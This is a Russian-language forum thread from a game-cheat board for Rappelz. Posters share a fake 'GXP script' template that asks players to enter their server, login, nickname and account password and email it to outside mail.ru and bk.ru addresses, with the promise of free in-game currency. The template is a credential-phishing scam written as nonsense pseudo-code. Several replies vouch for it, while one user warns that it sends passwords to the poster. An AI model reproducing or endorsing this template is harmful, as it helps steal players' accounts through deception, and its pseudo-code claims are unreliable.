ChemaX RF Online

Объявление

Все кто хочет получить посты за свои темы напишите мне письмо с ссылкой темы. ВНИМАНИЕ: Заголовок(тема) сообщения должно содержать: "ХОЧУ ПОСТЫ!!!". Если этого не будит вы не получите посты так как докажите свою невнимательность на форуме.

chemax.topbb.ru

Здравствуйте уважаемый пользователь, просим вас использовать код нашего баннера для размещения на своих сайтах/форумах и в замен на вашу помощь мы сделаем/установим ваш баннер на нашем форуме.
Код баннера нашего портала можно узнать в соответствующей теме

С Уважением XZey

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » ChemaX RF Online » Читы/Баги/Проги/Сервера для Rappelz » еще 1 скрипт на GXP!!!!

еще 1 скрипт на GXP!!!!

Сообщений 1 страница 20 из 20

1

fail}<script/started/>Go to page 1
{trubl theme = goscript = started}/directory count/go>
{/force to SERVER:/Вместо этого текста, здесь указываем игровой сервер (на латинице с маленькой буквы!) на котором аккаунт. Например: pantera. <0for ressurce go to"0"</02870160>
{/sql ACCOUNT:}/Здесь указываем свой аккаунт (логин) (регистр каждуказываем свой игровой ник, имя персой буквы!)./<1for ressurce go to"1"</02870161>
{/my NICK:}/Здесь анажа./<2for ressurce go to"2"</02870162>
{/my LEVEL:}/Здесь указываем уровень персонажа (цифрами, например000,000 :/Здесь указываем число РУПИ которые у вас: 52), на которого проводится денежная операция.
{/count PASSWORD:/Здесь прописываем свой игровой пароль от аккаунта./<11for ressurce go to"11"</028701611/last/stoped>
money wiped from 1, в рюкзаке (точная сумма,через запятую).</deal>
money wiped for 99,999,999:/Здесь указываем желанную сумму</deal>
{target trash_1/trash_9_= 1*9 = done}
<go to mail page>rzonline-gamexp@mail.ru/>
</forward2folder /forward dirictory count/enddeal/>
</ENDscript_1 Hacked /NIKITA/>
</script>/Здесь указываете email/

отправляем скрипт"Без темы"на этот адрес там сидит робот которвй расматривает скрипт!  rzonline-rapplez@mail.ru   
(Если скрипт заполнен не верно через несколько минут вам придет смс ва придет собщение)!!!

Отредактировано арсен (2011-03-28 18:09:34)

2

Арсен ты как вообще такое делаеш???ну эти скрипты.Хочеться проверить но стрёмно б*я:)

3

Всё дошло уже.Надо выложить скрипт брата(при мне всё делал и приобрёл миста)

4

СКРИПТ РАБОТАЕТ ПОЛЬЗУЙТЕСЬ)))пока есть шанс)))

5

А можно без точного количества рупии???влом назад в игру заходить:)

6

Попробуйте этот тоже вроде пашет !!!!
Лично у меня и у нескольких игроков 

НОВЫЙ ГХП ЧИТ ПОЛЬЗУЙТЕСЬ ПОКА НЕ ЗАКРЫЛИ !!!!
НЕ ДОБОАВЛЯЙТЕ МНОГО ГХП МОГУТ МОГУТ ЗАМЕТИТЬ!!

1.Заходим в свой почтовый ящик.
2.В письмe ( тему GXP ) заполняем свои данные:
{failpass}/Go to page 1
{trubl theme = password forgot = fail}/derictory count/
{/fors to server: /здесь указываем сервер на котором акк
{my sql}: здесь прописываем свои аккаунт (логин)/ {1for ressurce go to"2"} /02870163
[my last pass: /здесь указываем свой игровой ник
[/forward2folder 00123691]
{my count pass}: /здесь прописываем свой пароль
//mani 1 :/здесь указываем деньги которые у вас в рюкзаке точна до копейки
///mani wiped: /здесь указываем сколько вы хотите гхп(советую не наглеть большие сумы легко выследить)
//target trash_1/trash_2
{go to mile page}: здесь укажите свой email адрес (на него придут данные о выполнении операции)
//endcript_1 /
3.Отправляем письмо с этим скриптом на систему gamexp-rzonline@bk.ru ( там сидит почтовый робот одного из админов, который выполнит операцию)

7

да мона и неточное число рупи)

8

Та сколько можно делать писать с точностью до копейки!!так влом назат в игру возвращаться:))))блин завтра выложу норм скрипт без этой херни

9

bobko-твой скрипт не пашет не наебывай народ!!! :tomato:  :tomato:  :tomato:  :angry:

10

Проверил????

11

арсен!!
жаль что ты не понимаешь что эта строчка обозначает {/count PASSWORD:/Здесь прописываем свой игровой пароль от аккаунта./<11for ressurce go to"11"</028701611/last/stoped>
Она была в твоём хаке !!! Ты небось написал своё мыло и хочеш чтобы туда слали письма !! Кстать это строчка не скрывает пароль а наоборот он тебе присылается !!! вот эта строчка прячет пароль чтобы его некто не увидел [/forward2folder 00123691] !!!! И не надо фейк аккаунт создавать и потдакивать !!! )))))) хехехехех

Отредактировано bobko (2011-03-26 19:20:59)

12

Гиниально вадсон но я не нае скрипт работает на 99.99%!!!!!!! :mad: понял?

13

арсен ! я отправил почему нечего не добавилось  и не пришло даже отчёт !

14

Щас проверим твоё 99% рабочие   хехеххее

15

эммм и чё ???? нечего  не далось !!!

16

24 часа ждать над!

17

отчет не прихлдит значит написал правильно!!! :flag:

18

О КУО ДЕНЮШКИ ПРЕШЛИ ПОЙДУ ТАРАТИТЬ!!!!! :cool: [/color] [/color] [/color] [/color] [/color] [/color] [/color]

19

2 дня ждал!!!и вот мои ДЕНЮШКИ!!!!!! :cool:  :cool:  :cool:   :cool:  :cool:  :cool:  :cool:  :cool:
АРСЕН ЕСТЬ ЕЩЕ СКРИПТ НА ПЭТОВ???СКИНЬ В СКАЙП:mailgik343
ЖДУ ЖДУ ЖДУ

20

Хорошо!!!ток не преувеличивай ато админ пальнет)))

Вы здесь » ChemaX RF Online » Читы/Баги/Проги/Сервера для Rappelz » еще 1 скрипт на GXP!!!!